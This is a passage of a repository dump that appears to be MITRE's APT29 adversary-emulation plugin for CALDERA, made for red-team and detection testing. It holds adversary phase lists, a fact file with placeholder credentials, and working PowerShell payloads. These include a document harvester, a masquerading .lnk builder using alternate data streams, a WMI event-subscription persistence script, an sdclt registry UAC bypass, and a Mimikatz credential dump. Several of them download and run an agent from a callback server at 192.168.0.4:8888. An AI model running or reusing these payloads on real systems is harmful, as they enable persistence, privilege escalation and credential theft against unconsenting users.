Cleanup registry keys 21 | 22 | 7: 23 | - 4f7d21c9-ea31-4943-ad8a-efbbeeccdd7d # Download modified Sysinternals 24 | 25 | 8: 26 | - 646be6c9-f27a-4f5f-be5d-b8a0317e215f # Clean up process 27 | - 9b5b5aec-32ff-4d74-8555-727b50ab15f6 # Delete on disk files 28 | 29 | 9: 30 | - 6f1f4768-7099-45d2-a858-b49dc792234e # Load Stage 2 and perform discovery 31 | 32 | 10: 33 | - 9c75155e-21ab-4471-af16-45f3795a313c # Run persistence step one 34 | 35 | 11: 36 | - 45f18b58-c14f-4b61-a3da-41b67af21429 # Run persistence step two 37 | 38 | 12: 39 | - e7cab9bb-3e3a-4d93-99cc-3593c1dc8c6d # Dump chrome creds w/ accesschk 40 | 41 | 13: 42 | - c4f4b13c-87b6-498c-b814-93570173068c # Search for Private Keys 43 | 44 | 14: 45 | - a4b14c10-49aa-4ae4-b165-d5a37364fe62 # Rename psversion.txt to psversion.ps1 46 | 47 | 15: 48 | - a81ea4ad-bc9f-49a7-82d4-4466df641487 # Grab screenshot 49 | - ee4c2eab-be57-434c-a32c-14b77360301a # Grab clipboard 50 | - db28f68d-e8b8-46e6-b680-642570d4b257 # Grab keystrokes 51 | 52 | 16: 53 | - a612311d-a802-48da-bb7f-88a4b9dd7a24 # Exfiltrate data 54 | 55 | 17: 56 | - 95564347-e77a-4a89-b08f-dcafa5468f2c # Remote System Discovery 57 | - c4a59e39-53b0-4ace-9528-8ff052752ece # PowerShell system discovery of users on other machines 58 | 59 | 18: 60 | - bddc0abc-07a0-41b7-813f-e0c64d9226b3 # PsExec and execute Sandcat 61 | 62 | 19: 63 | - 00446217-53ca-4749-bacd-f41fe189d36e # RDP to trigger startup folder persistence 64 | 65 | 20: 66 | - 4bedbd9b-a570-4f9f-b78a-2f7f99ad5e92 # Clean up artifacts 67 | 68 | 21: 69 | - 4b2e9574-b1a7-4b38-95b2-6054ded9c4fe # Restart computer to trigger persistence mechanisms 70 | -------------------------------------------------------------------------------- /adversary_emulation/APT29/CALDERA_DIY/evals/data/adversaries/e55da81a-9ce7-4da8-8313-074362fd5dee.yml: -------------------------------------------------------------------------------- 1 | --- 2 | 3 | id: e55da81a-9ce7-4da8-8313-074362fd5dee 4 | name: ATT&CK Eval APT3 - 10 5 | 
description: Execution of Persistence 6 | visible: 1 7 | phases: 8 | 1: 9 | - 4b2e9574-b1a7-4b38-95b2-6054ded9c4fe -------------------------------------------------------------------------------- /adversary_emulation/APT29/CALDERA_DIY/evals/data/adversaries/ef93dd1b-809b-4a0b-b686-fef549cabbe4.yml: -------------------------------------------------------------------------------- 1 | --- 2 | 3 | id: ef93dd1b-809b-4a0b-b686-fef549cabbe4 4 | name: ATT&CK Eval APT3 - Full 5 | description: full evaluation 6 | visible: 1 7 | phases: 8 | 1: 9 | - ee08a427-1e1d-4d8a-aeb1-978a7fcf9087 # 2.A.1 10 | - 64f1fcb4-399d-4f3b-9a6b-13ec00e1c2ce # 2.A.2 11 | 2: 12 | - 35d95b64-c1f8-4ac7-a2f2-8959218239cd # 2.B.1 13 | 3: 14 | - 5df12481-9d8c-4235-b550-9cefc8ed7361 # 2.C.1 15 | - 41610306-087c-4c34-874b-37b8ed633a36 # 2.C.2 16 | 4: 17 | - 2ff877b4-0c00-401e-9d3f-070c70b610df # 2.D.1 18 | - 144b1384-5060-494f-80eb-91772695cdf3 # 2.D.2 19 | 5: 20 | - d2ea2676-7f85-4228-b980-ab3c0e1adc03 # 2.E.1 21 | - 7c2a6e5b-1adb-464f-a581-4677391f8dd6 # 2.E.2 22 | 6: 23 | - faa96e7f-081a-40b7-a743-a6a7f2627ea3 # 2.F.1 24 | - 26181249-be75-41ed-9fe7-5c30ea8c2d4d # 2.F.2 25 | - 84377d7a-0363-44fd-a082-44657ca1858f # 2.F.3 26 | 7: 27 | - 61221fb9-cb32-46d5-98fd-90567a621526 # 2.G.1 28 | - 9ce5bf9f-44ec-44c4-bbe0-6d68a83e1b76 # 2.G.2 29 | 8: 30 | - 5c23f638-9cfc-4fc4-9cab-4af628fef70a # 2.H.1 31 | 9: 32 | - 1345bff7-6f26-43b2-a92a-9aabccdb3db0 # 3.A.1 33 | 10: 34 | - 088b8639-3f37-42cc-9dc8-01aabb645461 # 3.B.1 - 3.C.1 35 | 11: 36 | - 59592c35-8207-4896-8d8b-36ad4600245d # 4.A.1 37 | - 24ed020e-4730-4000-b6b4-6b5d3e95314f # 4.A.2 38 | 12: 39 | - 5f4263c4-7ff1-4098-b5f5-f41faa31cf5b # 4.B.1 40 | 13: 41 | - ba0b398d-91b8-490a-bed2-f959afa8e1aa # 4.C.1 42 | 14: 43 | - 4ef6009d-2d62-4bb4-8de9-0458df2e9567 # 5.A.1 44 | 15: 45 | - effbedc1-1bc8-4a75-9395-980559700008 # 5.A.2 46 | 16: 47 | - 03afada1-1714-408f-bde5-f528b91dc89d # 5.B.1 - 8.A.2 48 | 17: 49 | - 0b1841bd-ef8b-475c-bce7-8fcb2860984a # 8.D.1 50 | 18: 
51 | - d5170a60-3bdc-44e0-9870-a38db5c0cf81 # 9.A.1
52 | - 2d18c8ec-4593-49dc-9bf4-11d0673d6ae6 # 9.B.1
53 | 19:
54 | - 4b2e9574-b1a7-4b38-95b2-6054ded9c4fe # 10.A.1 - 10.A.2
55 |
--------------------------------------------------------------------------------
/adversary_emulation/APT29/CALDERA_DIY/evals/data/sources/4fb34bde-b06d-445a-a146-8e35f79ce546.yml:
--------------------------------------------------------------------------------
# Fact source for the evaluation (id/name at the bottom). The trait names show that
# several facts hold account secrets (WinRM, profile users, OneDrive) in plaintext,
# so this file should be access-controlled and the accounts rotated after an exercise.
# Every value here looks like a per-environment placeholder (e.g. `WINRM_USR`) except
# `abc123`, which is a concrete archive password and should be replaced as well.
1 | facts:
2 | - trait: target.domain.name
3 |   value: TGTDOMAIN.lan
4 | - trait: target.winrm.username
5 |   value: WINRM_USR
6 | - trait: target.winrm.password
7 |   value: WINRM_PASS
8 | - trait: target.winrm.remote_host
9 |   value: WINRM_REMOTE_HOST
10 | - trait: pivot_machine_hostname
11 |   value: PIVOT_HOST_NAME
12 | - trait: 7zip_password
13 |   value: abc123
14 | - trait: profile_user
15 |   value: PROFILE_USER
16 | - trait: profile_user_password
17 |   value: PROFILE_USER_PASSWORD
18 | - trait: profile_user_day2
19 |   value: PROFILE_USER_DAY_2
20 | - trait: profile_user_password_day2
21 |   value: PROFILE_USER_DAY_2_PASSWORD
22 | - trait: onedrive.username
23 |   value: ONEDRIVE_USERNAME@outlook.com
24 | - trait: onedrive.url
25 |   value: ONEDRIVE_URL
26 | - trait: onedrive.password
27 |   value: ONEDRIVE_PASSWORD
28 |
29 | id: 4fb34bde-b06d-445a-a146-8e35f79ce546
30 | name: evals-round-2
31 | rules: []
32 |
--------------------------------------------------------------------------------
/adversary_emulation/APT29/CALDERA_DIY/evals/hook.py:
--------------------------------------------------------------------------------
1 | from plugins.evals.app.gui_api import GuiApi
2 |
3 | name = 'Evals'
4 | description = 'A plugin to start the DIY ATT&CK Based Evaluations with CALDERA'
5 | address = '/plugin/evals/gui'
6 |
7 | async def enable(services):
8 |     app = services.get('app_svc').application
9 |     file_svc = services.get('file_svc')
10 |     gui_api = GuiApi(services=services)
11 |
12 |     #app.router.add_static('/evals', 'plugins/evals/static/',
append_version=True) 13 | app.router.add_route('GET', '/plugin/evals/gui', gui_api.splash) 14 | -------------------------------------------------------------------------------- /adversary_emulation/APT29/CALDERA_DIY/evals/imgs/0-caldera.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/mitre-attack/attack-arsenal/201db70f403676cc8ec090035f17d98cf9995244/adversary_emulation/APT29/CALDERA_DIY/evals/imgs/0-caldera.png -------------------------------------------------------------------------------- /adversary_emulation/APT29/CALDERA_DIY/evals/imgs/1-caldera.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/mitre-attack/attack-arsenal/201db70f403676cc8ec090035f17d98cf9995244/adversary_emulation/APT29/CALDERA_DIY/evals/imgs/1-caldera.png -------------------------------------------------------------------------------- /adversary_emulation/APT29/CALDERA_DIY/evals/imgs/10-caldera.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/mitre-attack/attack-arsenal/201db70f403676cc8ec090035f17d98cf9995244/adversary_emulation/APT29/CALDERA_DIY/evals/imgs/10-caldera.png -------------------------------------------------------------------------------- /adversary_emulation/APT29/CALDERA_DIY/evals/imgs/11-caldera.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/mitre-attack/attack-arsenal/201db70f403676cc8ec090035f17d98cf9995244/adversary_emulation/APT29/CALDERA_DIY/evals/imgs/11-caldera.png -------------------------------------------------------------------------------- /adversary_emulation/APT29/CALDERA_DIY/evals/imgs/12-caldera.png: -------------------------------------------------------------------------------- 
https://raw.githubusercontent.com/mitre-attack/attack-arsenal/201db70f403676cc8ec090035f17d98cf9995244/adversary_emulation/APT29/CALDERA_DIY/evals/imgs/12-caldera.png -------------------------------------------------------------------------------- /adversary_emulation/APT29/CALDERA_DIY/evals/imgs/2-caldera.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/mitre-attack/attack-arsenal/201db70f403676cc8ec090035f17d98cf9995244/adversary_emulation/APT29/CALDERA_DIY/evals/imgs/2-caldera.png -------------------------------------------------------------------------------- /adversary_emulation/APT29/CALDERA_DIY/evals/imgs/3-caldera.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/mitre-attack/attack-arsenal/201db70f403676cc8ec090035f17d98cf9995244/adversary_emulation/APT29/CALDERA_DIY/evals/imgs/3-caldera.png -------------------------------------------------------------------------------- /adversary_emulation/APT29/CALDERA_DIY/evals/imgs/4-caldera.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/mitre-attack/attack-arsenal/201db70f403676cc8ec090035f17d98cf9995244/adversary_emulation/APT29/CALDERA_DIY/evals/imgs/4-caldera.png -------------------------------------------------------------------------------- /adversary_emulation/APT29/CALDERA_DIY/evals/imgs/5-caldera.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/mitre-attack/attack-arsenal/201db70f403676cc8ec090035f17d98cf9995244/adversary_emulation/APT29/CALDERA_DIY/evals/imgs/5-caldera.png -------------------------------------------------------------------------------- /adversary_emulation/APT29/CALDERA_DIY/evals/imgs/6-caldera.png: -------------------------------------------------------------------------------- 
https://raw.githubusercontent.com/mitre-attack/attack-arsenal/201db70f403676cc8ec090035f17d98cf9995244/adversary_emulation/APT29/CALDERA_DIY/evals/imgs/6-caldera.png -------------------------------------------------------------------------------- /adversary_emulation/APT29/CALDERA_DIY/evals/imgs/7-caldera.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/mitre-attack/attack-arsenal/201db70f403676cc8ec090035f17d98cf9995244/adversary_emulation/APT29/CALDERA_DIY/evals/imgs/7-caldera.png -------------------------------------------------------------------------------- /adversary_emulation/APT29/CALDERA_DIY/evals/imgs/8-caldera.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/mitre-attack/attack-arsenal/201db70f403676cc8ec090035f17d98cf9995244/adversary_emulation/APT29/CALDERA_DIY/evals/imgs/8-caldera.png -------------------------------------------------------------------------------- /adversary_emulation/APT29/CALDERA_DIY/evals/imgs/9-caldera.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/mitre-attack/attack-arsenal/201db70f403676cc8ec090035f17d98cf9995244/adversary_emulation/APT29/CALDERA_DIY/evals/imgs/9-caldera.png -------------------------------------------------------------------------------- /adversary_emulation/APT29/CALDERA_DIY/evals/imgs/CALDERA-APT29-README.tar: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/mitre-attack/attack-arsenal/201db70f403676cc8ec090035f17d98cf9995244/adversary_emulation/APT29/CALDERA_DIY/evals/imgs/CALDERA-APT29-README.tar -------------------------------------------------------------------------------- /adversary_emulation/APT29/CALDERA_DIY/evals/payloads/File-Collection.ps1: -------------------------------------------------------------------------------- 1 
| $env:APPDATA;$files=ChildItem -Path $env:USERPROFILE\ -Include *.doc,*.xps,*.xls,*.ppt,*.pps,*.wps,*.wpd,*.ods,*.odt,*.lwp,*.jtd,*.pdf,*.zip,*.rar,*.docx,*.url,*.xlsx,*.pptx,*.ppsx,*.pst,*.ost,*psw*,*pass*,*login*,*admin*,*sifr*,*sifer*,*vpn,*.jpg,*.txt,*.lnk -Recurse -ErrorAction SilentlyContinue | Select -ExpandProperty FullName; Compress-Archive -LiteralPath $files -CompressionLevel Optimal -DestinationPath $env:APPDATA\Draft.Zip -Force 2 | -------------------------------------------------------------------------------- /adversary_emulation/APT29/CALDERA_DIY/evals/payloads/Get-Screenshot.ps1: -------------------------------------------------------------------------------- 1 | function Get-Screenshot 2 | { 3 | <# SOURCE: https://github.com/EmpireProject/Empire/blob/master/data/module_source/collection/Get-Screenshot.ps1 #> 4 | param 5 | ( 6 | [Parameter(Mandatory = $False)] 7 | [string] 8 | $Ratio 9 | ) 10 | Add-Type -Assembly System.Windows.Forms; 11 | $ScreenBounds = [Windows.Forms.SystemInformation]::VirtualScreen; 12 | $ScreenshotObject = New-Object Drawing.Bitmap $ScreenBounds.Width, $ScreenBounds.Height; 13 | $DrawingGraphics = [Drawing.Graphics]::FromImage($ScreenshotObject); 14 | $DrawingGraphics.CopyFromScreen( $ScreenBounds.Location, [Drawing.Point]::Empty, $ScreenBounds.Size); 15 | $DrawingGraphics.Dispose(); 16 | $ms = New-Object System.IO.MemoryStream; 17 | if ($Ratio) { 18 | try { 19 | $iQual = [convert]::ToInt32($Ratio); 20 | } catch { 21 | $iQual=80; 22 | } 23 | if ($iQual -gt 100){ 24 | $iQual=100; 25 | } elseif ($iQual -lt 1){ 26 | $iQual=1; 27 | } 28 | $encoderParams = New-Object System.Drawing.Imaging.EncoderParameters; 29 | $encoderParams.Param[0] = New-Object Drawing.Imaging.EncoderParameter ([System.Drawing.Imaging.Encoder]::Quality, $iQual); 30 | $jpegCodec = [Drawing.Imaging.ImageCodecInfo]::GetImageEncoders() | Where-Object { $_.FormatDescription -eq "JPEG" } 31 | $ScreenshotObject.save($ms, $jpegCodec, $encoderParams); 32 | } else { 
33 | $ScreenshotObject.save($ms, [Drawing.Imaging.ImageFormat]::Png); 34 | } 35 | $ScreenshotObject.Dispose(); 36 | [convert]::ToBase64String($ms.ToArray()); 37 | } 38 | -------------------------------------------------------------------------------- /adversary_emulation/APT29/CALDERA_DIY/evals/payloads/Modified-SysInternalsSuite.zip: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/mitre-attack/attack-arsenal/201db70f403676cc8ec090035f17d98cf9995244/adversary_emulation/APT29/CALDERA_DIY/evals/payloads/Modified-SysInternalsSuite.zip -------------------------------------------------------------------------------- /adversary_emulation/APT29/CALDERA_DIY/evals/payloads/README.md: -------------------------------------------------------------------------------- 1 | ### Payloads Explained 2 | * ```2016_United_States_presidential_election_-_Wikipedia.html```: Staging payload for ADFS. 3 | * ```cod.3aka.scr.exe```: Sandcat payload to complete RTLO execution. 4 | * ``` dmevals.local.pfx```: Staged private key used for Get-PrivateKey discovery. 5 | * ``` File-Collection.ps1```: PowerShell script to collect the following: 6 | * *.doc 7 | * *.xps 8 | * *.xls 9 | * *.ppt 10 | * *.pps 11 | * *.wps 12 | * *.wpd 13 | * *.ods 14 | * *.odt 15 | * *.lwp 16 | * *.jtd 17 | * *.pdf 18 | * *.zip 19 | * *.rar 20 | * *.docx 21 | * *.url 22 | * *.xlsx 23 | * *.pptx 24 | * *.ppsx 25 | * *.pst 26 | * *.ost 27 | * *psw* 28 | * *pass* 29 | * *login* 30 | * *admin* 31 | * *sifr* 32 | * *sifer* 33 | * *vpn 34 | * *.jpg 35 | * *.txt 36 | * *.lnk 37 | * ``` Get-Screenshot.ps1```: [PowerShell Empire Script](https://github.com/EmpireProject/Empire/blob/master/data/module_source/collection/Get-Screenshot.ps1) script to take screenshots. 
38 | * ``` Invoke-BypassUACTokenManipulation.ps1```: [PowerShell Empire script](https://github.com/EmpireProject/Empire/blob/master/data/module_source/privesc/Invoke-BypassUACTokenManipulation.ps1) to bypass UAC. 39 | * ``` Invoke-Mimikatz.ps1```: [PowerShell Empire script](https://github.com/EmpireProject/Empire/blob/master/data/module_source/credentials/Invoke-Mimikatz.ps1) to execute Mimikatz. 40 | * ``` Invoke-PSInject.ps1```: [PowerShell Empire script](https://github.com/EmpireProject/Empire/blob/master/data/module_source/management/Invoke-PSInject.ps1) to execute base64-encoded PowerShell code. 41 | * ``` invoke-winrmsession.ps1```: [PoshC2 script](https://github.com/nettitude/PoshC2/blob/master/resources/modules/Invoke-WinRMSession.ps1) to create WinRM sessions. 42 | * ``` make_lnk.ps1```: Payload generation script to create a masquerading .lnk file. 43 | * ``` m.exe```: [Mimikatz](https://github.com/gentilkiwi/mimikatz) executable. 44 | * ``` MITRE-ATTACK-EVALS.HTML```: Staged .html only used for Discovery. 45 | * ``` Modified-SysInternalsSuite.zip```: Utilities used in persistence mechanisms that are stored within a SysInternals directory. 46 | 47 | **Note: none of the utilities here are actually Windows SysInternals tools. 48 | The SysInternals suite is downloaded from Microsoft during Day-1 A execution.** 49 | 50 | * ``` monkey.png```: Steganography PNG with encoded payload. 51 | * ``` powerview.ps1```: PowerView functions to execute reflective loading. 52 | * ``` ps.ps1```: Process enumeration. 53 | * ``` rar.exe```: Archive utility. 54 | * ``` sandcat.go-windows```: Sandcat binary. 55 | * ``` sandcat.go-windows-upx```: UPX-packed Sandcat binary. 56 | * ``` schemas.ps1```: Payload generation script using alternate data streams. 57 | * ``` setup.py```: Setup utility to update all payloads with the appropriate IP:PORT. 58 | * ``` StealToken.ps1```: Steal a process' token. 59 | * ``` stepFifteen_wmi.ps1```: WMI persistence. 
60 | * ``` stepFourteen_bypassUAC.ps1```: UAC bypass via sdclt.exe. 61 | * ``` stepFourteen_credDump.ps1```: WMI Based credential dump. 62 | * ``` stepSeventeen_email.ps1```: Outlook e-mail enumeration. 63 | * ``` stepSeventeen_zip.ps1```: Zip up a directory. 64 | * ``` stepSixteen_SID.ps1```: Get SID of user. 65 | * ``` stepThirteen.ps1```: Discovery functions. 66 | * ``` stepTwelve.ps1```: Detect AntiVirus. 67 | * ``` timestomp.ps1```: Timestomp a file. 68 | * ``` update.ps1```: Update sandcat payload. 69 | * ``` upload.ps1```: CALDERA upload utility. 70 | * ``` wipe.ps1```: Reflectivly load sdelete64.exe. 71 | -------------------------------------------------------------------------------- /adversary_emulation/APT29/CALDERA_DIY/evals/payloads/dmevals.local.pfx: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/mitre-attack/attack-arsenal/201db70f403676cc8ec090035f17d98cf9995244/adversary_emulation/APT29/CALDERA_DIY/evals/payloads/dmevals.local.pfx -------------------------------------------------------------------------------- /adversary_emulation/APT29/CALDERA_DIY/evals/payloads/invoke-winrmsession.ps1: -------------------------------------------------------------------------------- 1 | Function Get-RandomName 2 | { 3 | param ( 4 | [int]$Length 5 | ) 6 | $set = 'abcdefghijklmnopqrstuvwxyz'.ToCharArray() 7 | $result = '' 8 | for ($x = 0; $x -lt $Length; $x++) 9 | {$result += $set | Get-Random} 10 | return $result 11 | } 12 | Function Invoke-WinRMSession { 13 | param ( 14 | $username, 15 | $Password, 16 | $IPAddress 17 | ) 18 | $PSS = ConvertTo-SecureString $password -AsPlainText -Force 19 | $getcreds = new-object system.management.automation.PSCredential $username,$PSS 20 | 21 | return (New-PSSession -ComputerName $IPAddress -Credential $getcreds) 22 | } 23 | -------------------------------------------------------------------------------- /adversary_emulation/APT29/CALDERA_DIY/evals/payloads/m.exe: 
-------------------------------------------------------------------------------- https://raw.githubusercontent.com/mitre-attack/attack-arsenal/201db70f403676cc8ec090035f17d98cf9995244/adversary_emulation/APT29/CALDERA_DIY/evals/payloads/m.exe -------------------------------------------------------------------------------- /adversary_emulation/APT29/CALDERA_DIY/evals/payloads/make_lnk.ps1: -------------------------------------------------------------------------------- 1 | $destination = "37486-the-shocking-truth-about-election-rigging-in-america.rtf.lnk" 2 | $shell = New-Object -COM WScript.Shell 3 | $shortcut = $shell.CreateShortcut($destination) 4 | $shortcut.TargetPath = "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" 5 | $shortcut.Arguments = "Get-Content '.\2016_United_States_presidential_election_-_Wikipedia.html' -Stream schemas | IEX" 6 | $shortcut.Description = "The Shocking Truth About Election Rigging in America" 7 | $shortcut.Save() 8 | Add-Content -Path '.\2016_United_States_presidential_election_-_Wikipedia.html' -Value $(Get-Content .\schemas.ps1) -Stream schemas -------------------------------------------------------------------------------- /adversary_emulation/APT29/CALDERA_DIY/evals/payloads/monkey.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/mitre-attack/attack-arsenal/201db70f403676cc8ec090035f17d98cf9995244/adversary_emulation/APT29/CALDERA_DIY/evals/payloads/monkey.png -------------------------------------------------------------------------------- /adversary_emulation/APT29/CALDERA_DIY/evals/payloads/rar.exe: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/mitre-attack/attack-arsenal/201db70f403676cc8ec090035f17d98cf9995244/adversary_emulation/APT29/CALDERA_DIY/evals/payloads/rar.exe -------------------------------------------------------------------------------- 
/adversary_emulation/APT29/CALDERA_DIY/evals/payloads/sandcat.go-windows: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/mitre-attack/attack-arsenal/201db70f403676cc8ec090035f17d98cf9995244/adversary_emulation/APT29/CALDERA_DIY/evals/payloads/sandcat.go-windows -------------------------------------------------------------------------------- /adversary_emulation/APT29/CALDERA_DIY/evals/payloads/sandcat.go-windows-upx: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/mitre-attack/attack-arsenal/201db70f403676cc8ec090035f17d98cf9995244/adversary_emulation/APT29/CALDERA_DIY/evals/payloads/sandcat.go-windows-upx -------------------------------------------------------------------------------- /adversary_emulation/APT29/CALDERA_DIY/evals/payloads/schemas.ps1: -------------------------------------------------------------------------------- 1 | gwmi -namespace root\cimv2 -query "SELECT * FROM Win32_BIOS" 2 | gwmi -namespace root\cimv2 -query "SELECT * FROM Win32_PnPEntity" 3 | gwmi -namespace root\cimv2 -query "Select * from Win32_ComputerSystem" 4 | gwmi -namespace root\cimv2 -query "SELECT * FROM Win32_Process" 5 | (Get-Item -Path ".\" -Verbose).FullName 6 | $bin = "" 7 | $bin | Add-Content -Path blob 8 | certutil -decode blob "$env:appdata\Microsoft\kxwn.lock" 9 | Remove-Item -Path blob 10 | New-ItemProperty -Force -Path "HKCU:\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" -Name "WebCache" -Value "C:\windows\system32\rundll32.exe $env:appdata\Microsoft\kxwn.lock,VoidFunc" 11 | $ps_cradle = '$server="http://192.168.0.4:8888";$url="$server/file/download";$wc=New-Object System.Net.WebClient;$wc.Headers.add("platform","windows");$wc.Headers.add("file","sandcat.go");$data=$wc.DownloadData($url);$name="iex-cradle";get-process | ? 
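{$_.modules.filename -like "C:\Users\Public\$name.exe"} | stop-process -f;rm -force "C:\Users\Public\$name.exe" -ea ignore;[io.file]::WriteAllBytes("C:\Users\Public\$name.exe",$data) | Out-Null;Start-Process -FilePath C:\Users\Public\$name.exe -ArgumentList "-server $server -group iex-cradle" -WindowStyle hidden;'
12 | IEX($ps_cradle)
13 | Invoke-Item '2016_United_States_presidential_election_-_Wikipedia.html'
14 |
--------------------------------------------------------------------------------
/adversary_emulation/APT29/CALDERA_DIY/evals/payloads/setup.py:
--------------------------------------------------------------------------------
#!/usr/bin/env python3
import fileinput
import re
import os

# Matches the callback address baked into the payloads, http://IP:PORT or
# https://IP:PORT with a dotted-quad IPv4 host (same pattern as before, compiled once).
CALLBACK_RE = re.compile(
    r'https?:\/\/((25[0-5]|2[0-4][0-9]|[01]?[0-9][0-9]?)\.){3}'
    r'(25[0-5]|2[0-4][0-9]|[01]?[0-9][0-9]?):\d{1,6}'
)


def _rewrite_callbacks(line, server):
    """Return `line` with every embedded http[s]://IP:PORT replaced by `server`.

    The replacement is supplied as a callable so that a backslash or `\\g<..>`
    typed at the prompt is inserted literally instead of being interpreted as an
    re.sub() template escape (which previously could raise or mangle the output).
    """
    return CALLBACK_RE.sub(lambda _m: server, line)


def main():
    """Rewrite the callback server inside every .ps1/.txt file in the CWD, in place.

    Prompts for the new http[s]://IP:PORT value and streams each eligible file
    through fileinput so it is rewritten line by line.  If the prompt is empty or
    not of the expected form the script exits with a message and changes nothing;
    an empty replacement would otherwise silently strip the callback URL from
    every payload.
    """
    server = input("Enter callback server http[s]://IP:PORT: ").strip()
    if not re.fullmatch(r'https?://\S+', server):
        raise SystemExit("Expected a value of the form http[s]://IP:PORT; nothing was changed.")

    for filename in os.listdir():
        # Only the PowerShell payloads and text files carry the callback address.
        if os.path.splitext(filename)[1] not in (".ps1", ".txt"):
            continue

        # inplace=True redirects stdout into the file, so print() writes the new content.
        with fileinput.FileInput(filename, inplace=True) as FILE:
            for line in FILE:
                print(_rewrite_callbacks(line, server), end='')

    print("Done!")


if __name__ == "__main__":
    main()
--------------------------------------------------------------------------------
/adversary_emulation/APT29/CALDERA_DIY/evals/payloads/stepFifteen_wmi.ps1:
--------------------------------------------------------------------------------
1 | function wmi {
2 |
3 | $FilterArgs = @{name='WindowsParentalControlMigration';
4 | EventNameSpace='root\CimV2';
5 | QueryLanguage="WQL";
6 | Query = "SELECT * FROM __InstanceCreationEvent WITHIN 10 WHERE TargetInstance ISA 'Win32_LoggedOnUser' AND TargetInstance.__RELPATH like '%$($env:UserName)%'";}
7 | $Filter=New-CimInstance -Namespace root/subscription -ClassName __EventFilter -Property $FilterArgs
8 |
9 | $ConsumerArgs =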
@{name='WindowsParentalControlMigration'; 10 | CommandLineTemplate='PowerShell.exe -C $server="http://192.168.0.4:8888";$url="$server/file/download";$wc=New-Object System.Net.WebClient;$wc.Headers.add("platform","windows");$wc.Headers.add("file","sandcat.go");$data=$wc.DownloadData($url);$name=$wc.ResponseHeaders["Content-Disposition"].Substring($wc.ResponseHeaders["Content-Disposition"].IndexOf("filename=")+9).Replace("`"","");get-process | ? {$_.modules.filename -like "C:\Users\Public\$name.exe"} | stop-process -f;rm -force "C:\Users\Public\$name.exe" -ea ignore;[io.file]::WriteAllBytes("C:\Users\Public\$name.exe",$data) | Out-Null;Start-Process -FilePath C:\Users\Public\$name.exe -ArgumentList "-server $server -group red-wmi" -WindowStyle hidden;'} 11 | $Consumer=New-CimInstance -Namespace root/subscription -ClassName CommandLineEventConsumer -Property $ConsumerArgs 12 | 13 | $FilterToConsumerArgs = @{ 14 | Filter = [Ref] $Filter 15 | Consumer = [Ref] $Consumer 16 | } 17 | $FilterToConsumerBinding = New-CimInstance -Namespace root/subscription -ClassName __FilterToConsumerBinding -Property $FilterToConsumerArgs 18 | } 19 | -------------------------------------------------------------------------------- /adversary_emulation/APT29/CALDERA_DIY/evals/payloads/stepFourteen_bypassUAC.ps1: -------------------------------------------------------------------------------- 1 | function bypass { 2 | New-Item -Force -Path "HKCU:\Software\Classes\Folder\shell\open\command" -Value 'powershell -exec bypass -Noninteractive -windowstyle hidden $server="http://192.168.0.4:8888";$url="$server/file/download";$wc=New-Object System.Net.WebClient;$wc.Headers.add("platform","windows");$wc.Headers.add("file","sandcat.go");$data=$wc.DownloadData($url);$name=$wc.ResponseHeaders["Content-Disposition"].Substring($wc.ResponseHeaders["Content-Disposition"].IndexOf("filename=")+9).Replace("`"","");get-process | ? 
{$_.modules.filename -like "C:\Users\Public\$name.exe"} | stop-process -f;rm -force "C:\Users\Public\$name.exe" -ea ignore;[io.file]::WriteAllBytes("C:\Users\Public\$name.exe",$data) | Out-Null;Start-Process -FilePath C:\Users\Public\$name.exe -ArgumentList "-server $server -group bypass-UAC" -WindowStyle hidden;' 3 | New-ItemProperty -Force -Path "HKCU:\Software\Classes\Folder\shell\open\command" -Name "DelegateExecute" 4 | Start-Process -FilePath $env:windir\system32\sdclt.exe 5 | Start-Sleep -s 3 6 | Remove-Item -Path "HKCU:\Software\Classes\Folder" -Recurse 7 | } -------------------------------------------------------------------------------- /adversary_emulation/APT29/CALDERA_DIY/evals/payloads/stepFourteen_credDump.ps1: -------------------------------------------------------------------------------- 1 | function wmidump { 2 | # Change $server to Caldera server ip 3 | $server = "http://192.168.0.4:8888/file/download" 4 | $wc = New-Object System.Net.WebClient; $wc.Headers.Add("file","m.exe"); $wc.DownloadFile($server,"m.exe"); $ProcessInfo = New-Object System.Diagnostics.ProcessStartInfo; $ProcessInfo.FileName = "m.exe"; $ProcessInfo.RedirectStandardError = $true; $ProcessInfo.RedirectStandardOutput = $true; $ProcessInfo.UseShellExecute = $false; $ProcessInfo.Arguments = @("privilege::debug","sekurlsa::logonpasswords","exit"); $Process = New-Object System.Diagnostics.Process; $Process.StartInfo = $ProcessInfo; $Process.Start() | Out-Null; $output = $Process.StandardOutput.ReadToEnd(); $Pws = ""; ForEach ($line in $($output -split "`r`n")) {if ($line.Contains('Password') -and ($line.length -lt 50)) {$Pws += $line}}; $PwBytes = [System.Text.Encoding]::Unicode.GetBytes($Pws); Set-WmiInstance -Path \\.\root\cimv2:Win32_AuditCode -Argument @{Result=$PwBytes} 5 | 6 | $newClass = New-Object System.Management.ManagementClass("root\cimv2", [String]::Empty, $null) 7 | $newClass["__CLASS"] = "Win32_AuditCode" 8 | $newClass.Qualifiers.Add("Static", $true) 9 | 
